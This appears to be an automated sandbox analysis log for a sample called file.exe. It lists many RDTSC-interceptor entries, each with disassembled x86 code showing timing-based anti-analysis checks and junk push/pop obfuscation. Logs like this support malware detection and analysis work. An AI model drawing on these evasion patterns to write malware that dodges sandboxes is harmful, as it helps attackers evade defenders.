                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49A5F second address: D49A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1770B77E9Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4DB8E second address: D4DB9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F379FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E959 second address: D4E95D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4ABD1 second address: D4ABD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49A74 second address: D49A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F1770B77E96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4DB9D second address: D4DBC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F1770F379FCh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4ABD6 second address: D4ABDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EB01 second address: D4EB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49A7E second address: D49A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4ABDC second address: D4ABE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EB05 second address: D4EB09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D50871 second address: D5087B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1770F379F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5087B second address: D50892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77E9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D50892 second address: D50899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4FA69 second address: D4FA6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51AA8 second address: D51AB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4FA6D second address: D4FA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4FA73 second address: D4FA94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4FA94 second address: D4FA9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52DFB second address: D52E00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52E00 second address: D52E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53DF7 second address: D53E71 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 ja 00007F1770F37A00h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F1770F379F8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+1245DEA5h] 0x0000002f push 00000000h 0x00000031 mov ebx, esi 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F1770F379F8h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f or dword ptr [ebp+12471895h], eax 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 jno 00007F1770F379F6h 0x0000005e pop edx 0x0000005f pop eax 0x00000060 push eax 0x00000061 pushad 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54E54 second address: D54E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55E3F second address: D55E43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55E43 second address: D55E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F1770B77E98h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53F9A second address: D53FA0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53FA0 second address: D53FAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F1770B77E96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53FAA second address: D5403C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F379FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov di, si 0x00000011 mov ebx, 22D96808h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F1770F379F8h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov edi, dword ptr [ebp+122D2A2Ah] 0x00000044 mov eax, dword ptr [ebp+122D14E5h] 0x0000004a push 00000000h 0x0000004c push edi 0x0000004d call 00007F1770F379F8h 0x00000052 pop edi 0x00000053 mov dword ptr [esp+04h], edi 0x00000057 add dword ptr [esp+04h], 0000001Ah 0x0000005f inc edi 0x00000060 push edi 0x00000061 ret 0x00000062 pop edi 0x00000063 ret 0x00000064 mov bx, 1DEEh 0x00000068 push FFFFFFFFh 0x0000006a pushad 0x0000006b mov ah, C2h 0x0000006d mov ax, 0AF0h 0x00000071 popad 0x00000072 nop 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 popad 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5403C second address: D54040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54040 second address: D54046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54046 second address: D54075 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F1770B77EA3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51D84 second address: D51D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51D88 second address: D51D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51D92 second address: D51D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5500C second address: D55012 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D570C5 second address: D57177 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c adc di, E430h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f sub ebx, 01971567h 0x00000025 mov eax, dword ptr [ebp+122D1459h] 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F1770F379F8h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 sbb edi, 39CE4754h 0x0000004b sub di, F37Dh 0x00000050 push FFFFFFFFh 0x00000052 push 00000000h 0x00000054 push edi 0x00000055 call 00007F1770F379F8h 0x0000005a pop edi 0x0000005b mov dword ptr [esp+04h], edi 0x0000005f add dword ptr [esp+04h], 00000019h 0x00000067 inc edi 0x00000068 push edi 0x00000069 ret 0x0000006a pop edi 0x0000006b ret 0x0000006c or dword ptr [ebp+124717D5h], edi 0x00000072 jmp 00007F1770F37A09h 0x00000077 nop 0x00000078 pushad 0x00000079 push eax 0x0000007a push edx 0x0000007b pushad 0x0000007c popad 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57177 second address: D57190 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5903E second address: D59044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59044 second address: D59049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59049 second address: D59073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F379FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1770F37A09h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59118 second address: D59123 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F1770B77E96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59123 second address: D5912F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61700 second address: D61704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61704 second address: D61708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6103C second address: D61058 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6118C second address: D611A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D611A8 second address: D611AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF262E second address: CF2634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2634 second address: CF2669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 jmp 00007F1770B77EA0h 0x0000000b jmp 00007F1770B77EA7h 0x00000010 pop edi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2669 second address: CF266F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF266F second address: CF2680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1770B77E9Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2680 second address: CF268D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F1770F379F6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF268D second address: CF269C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F1770B77E96h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6702B second address: D6702F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6702F second address: D67042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1770B77E9Bh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67042 second address: D6708E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F1770F37A05h 0x00000011 jmp 00007F1770F379FEh 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jbe 00007F1770F37A16h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6708E second address: D670D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c jmp 00007F1770B77EA3h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 jnl 00007F1770B77E98h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D670D1 second address: D670D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D670D7 second address: B91ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 jng 00007F1770B77E97h 0x0000000d clc 0x0000000e push dword ptr [ebp+122D16FDh] 0x00000014 js 00007F1770B77EA2h 0x0000001a pushad 0x0000001b mov cx, 8B60h 0x0000001f jl 00007F1770B77E96h 0x00000025 popad 0x00000026 call dword ptr [ebp+122D1D18h] 0x0000002c pushad 0x0000002d pushad 0x0000002e sub dword ptr [ebp+122D3A0Eh], eax 0x00000034 movsx edi, ax 0x00000037 popad 0x00000038 xor eax, eax 0x0000003a xor dword ptr [ebp+122D3A0Eh], esi 0x00000040 mov dword ptr [ebp+122D3A0Eh], ecx 0x00000046 mov edx, dword ptr [esp+28h] 0x0000004a add dword ptr [ebp+122D3A0Eh], ebx 0x00000050 mov dword ptr [ebp+122D29EAh], eax 0x00000056 jmp 00007F1770B77EA3h 0x0000005b mov esi, 0000003Ch 0x00000060 stc 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 mov dword ptr [ebp+122D23CAh], esi 0x0000006b lodsw 0x0000006d mov dword ptr [ebp+122D1848h], edi 0x00000073 add dword ptr [ebp+122D23CAh], esi 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d cmc 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 pushad 0x00000083 mov bl, dh 0x00000085 mov si, bx 0x00000088 popad 0x00000089 nop 0x0000008a push edi 0x0000008b push eax 0x0000008c push edx 0x0000008d jmp 00007F1770B77E9Dh 0x00000092 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BB99 second address: D6BBCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1770F379FEh 0x00000011 jno 00007F1770F379F8h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BBCF second address: D6BBDC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1770B77E98h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C1A0 second address: D6C1A6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C1A6 second address: D6C1AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C1AD second address: D6C1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770F37A03h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jl 00007F1770F37A02h 0x00000012 jmp 00007F1770F379FAh 0x00000017 push eax 0x00000018 pop eax 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push esi 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 pop esi 0x00000022 push edi 0x00000023 jmp 00007F1770F379FAh 0x00000028 pop edi 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F1770F379FCh 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C1FC second address: D6C20E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77E9Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C356 second address: D6C35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C35E second address: D6C396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770B77EA2h 0x00000009 popad 0x0000000a push edi 0x0000000b jmp 00007F1770B77EA9h 0x00000010 jbe 00007F1770B77E96h 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C396 second address: D6C39C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C39C second address: D6C3B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770B77EA8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C3B8 second address: D6C3C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F1770F379F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C52A second address: D6C532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C532 second address: D6C543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 js 00007F1770F37A04h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C543 second address: D6C547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C9C0 second address: D6C9D2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1770F379F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71729 second address: D7172D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7172D second address: D71738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71738 second address: D71745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F1770B77E96h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71745 second address: D7174B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D718AE second address: D718CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jng 00007F1770B77E96h 0x0000000f jmp 00007F1770B77E9Eh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D718CF second address: D718EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 jmp 00007F1770F37A03h 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D718EB second address: D718F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D718F1 second address: D718F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71D05 second address: D71D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1770B77E96h 0x0000000a jmp 00007F1770B77E9Dh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71D21 second address: D71D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71D27 second address: D71D31 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1770B77E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72154 second address: D7218A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A09h 0x00000007 jc 00007F1770F379F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F1770F37A00h 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
